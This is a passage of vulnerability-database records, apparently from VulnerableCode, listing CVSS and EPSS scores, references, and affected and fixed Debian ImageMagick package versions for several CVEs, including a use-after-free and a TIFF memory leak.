scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-25794

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2442110
reference_id	2442110
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2442110

reference_url

https://github.com/advisories/GHSA-vhqj-f5cj-9x8h

reference_id

GHSA-vhqj-f5cj-9x8h

reference_type

scores

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-vhqj-f5cj-9x8h

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u6?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u6?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u6%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.15%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.15%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.15%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2026-25794, GHSA-vhqj-f5cj-9x8h

risk_score 4.0

exploitability 0.5

weighted_severity 8.0

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-xbsu-ac6g-53fn

url VCID-yah4-bf7d-w7f4

vulnerability_id VCID-yah4-bf7d-w7f4

summary ImageMagick: heap use-after-free issue in ReplaceXmpValue() function in MagickCore/profile.c.

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-34475.json

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-34475.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2023-34475

reference_id

reference_type

scores

value	0.00023
scoring_system	epss
scoring_elements	0.06147
published_at	2026-04-08T12:55:00Z

value	0.00023
scoring_system	epss
scoring_elements	0.06091
published_at	2026-04-02T12:55:00Z

value	0.00023
scoring_system	epss
scoring_elements	0.06121
published_at	2026-04-04T12:55:00Z

value	0.00023
scoring_system	epss
scoring_elements	0.06105
published_at	2026-04-07T12:55:00Z

value	0.00023
scoring_system	epss
scoring_elements	0.06184
published_at	2026-04-09T12:55:00Z

value	0.00023
scoring_system	epss
scoring_elements	0.06176
published_at	2026-04-11T12:55:00Z

value	0.00024
scoring_system	epss
scoring_elements	0.06613
published_at	2026-04-18T12:55:00Z

value	0.00024
scoring_system	epss
scoring_elements	0.06697
published_at	2026-04-12T12:55:00Z

value	0.00024
scoring_system	epss
scoring_elements	0.06687
published_at	2026-04-13T12:55:00Z

value	0.00024
scoring_system	epss
scoring_elements	0.0662
published_at	2026-04-16T12:55:00Z

value	0.00024
scoring_system	epss
scoring_elements	0.06769
published_at	2026-04-21T12:55:00Z

value	0.00024
scoring_system	epss
scoring_elements	0.06778
published_at	2026-04-24T12:55:00Z

value	0.00024
scoring_system	epss
scoring_elements	0.06797
published_at	2026-04-26T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2023-34475

reference_url

https://github.com/ImageMagick/ImageMagick/commit/1061db7f80fdc9ef572ac60b55f408f7bab6e1b0

reference_id

1061db7f80fdc9ef572ac60b55f408f7bab6e1b0

reference_type

scores

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-12-03T16:25:17Z/

url

https://github.com/ImageMagick/ImageMagick/commit/1061db7f80fdc9ef572ac60b55f408f7bab6e1b0

reference_url

https://bugzilla.redhat.com/show_bug.cgi?id=2214149

reference_id

2214149

reference_type

scores

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-12-03T16:25:17Z/

url

https://bugzilla.redhat.com/show_bug.cgi?id=2214149

reference_url

https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/45DUUXYMAEEAW55GSLAXN25VPKCRAIDA/

reference_id

45DUUXYMAEEAW55GSLAXN25VPKCRAIDA

reference_type

scores

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-12-03T16:25:17Z/

url

https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/45DUUXYMAEEAW55GSLAXN25VPKCRAIDA/

reference_url

https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UFQJCYJ23HWHNDOVKBHZQ7HCXXL6MM3/

reference_id

4UFQJCYJ23HWHNDOVKBHZQ7HCXXL6MM3

reference_type

scores

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-12-03T16:25:17Z/

url

https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UFQJCYJ23HWHNDOVKBHZQ7HCXXL6MM3/

reference_url

https://access.redhat.com/security/cve/CVE-2023-34475

reference_id

CVE-2023-34475

reference_type

scores

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-12-03T16:25:17Z/

url

https://access.redhat.com/security/cve/CVE-2023-34475

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2023-34475

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-yah4-bf7d-w7f4

url VCID-ypyd-2tg4-xqb1

vulnerability_id VCID-ypyd-2tg4-xqb1

summary ImageMagick: memory leak in TIFFWritePhotoshopLayers function in coders/tiff.c

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-16641.json

reference_id

reference_type

scores

value	3.3
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-16641.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2018-16641

reference_id

reference_type

scores

value	0.00408
scoring_system	epss
scoring_elements	0.61062
published_at	2026-04-01T12:55:00Z

value	0.00408
scoring_system	epss
scoring_elements	0.61139
published_at	2026-04-02T12:55:00Z

value	0.00408
scoring_system	epss
scoring_elements	0.61167
published_at	2026-04-04T12:55:00Z

value	0.00408
scoring_system	epss
scoring_elements	0.61133
published_at	2026-04-07T12:55:00Z

value	0.00408
scoring_system	epss
scoring_elements	0.61181
published_at	2026-04-08T12:55:00Z

value	0.00408
scoring_system	epss
scoring_elements	0.61196
published_at	2026-04-09T12:55:00Z

value	0.00408
scoring_system	epss
scoring_elements	0.61216
published_at	2026-04-11T12:55:00Z

value	0.00408
scoring_system	epss
scoring_elements	0.61203
published_at	2026-04-12T12:55:00Z

value	0.00408
scoring_system	epss
scoring_elements	0.61184
published_at	2026-04-13T12:55:00Z

value	0.00408
scoring_system	epss
scoring_elements	0.61224
published_at	2026-04-16T12:55:00Z

value	0.00408
scoring_system	epss
scoring_elements	0.61229
published_at	2026-04-18T12:55:00Z

value	0.00408
scoring_system	epss
scoring_elements	0.61211
published_at	2026-04-21T12:55:00Z

value	0.00408
scoring_system	epss
scoring_elements	0.612
published_at	2026-04-24T12:55:00Z

value	0.00408
scoring_system	epss
scoring_elements	0.61215
published_at	2026-04-26T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2018-16641

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	3.3
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1626585
reference_id	1626585
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1626585

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2018-16641

risk_score null

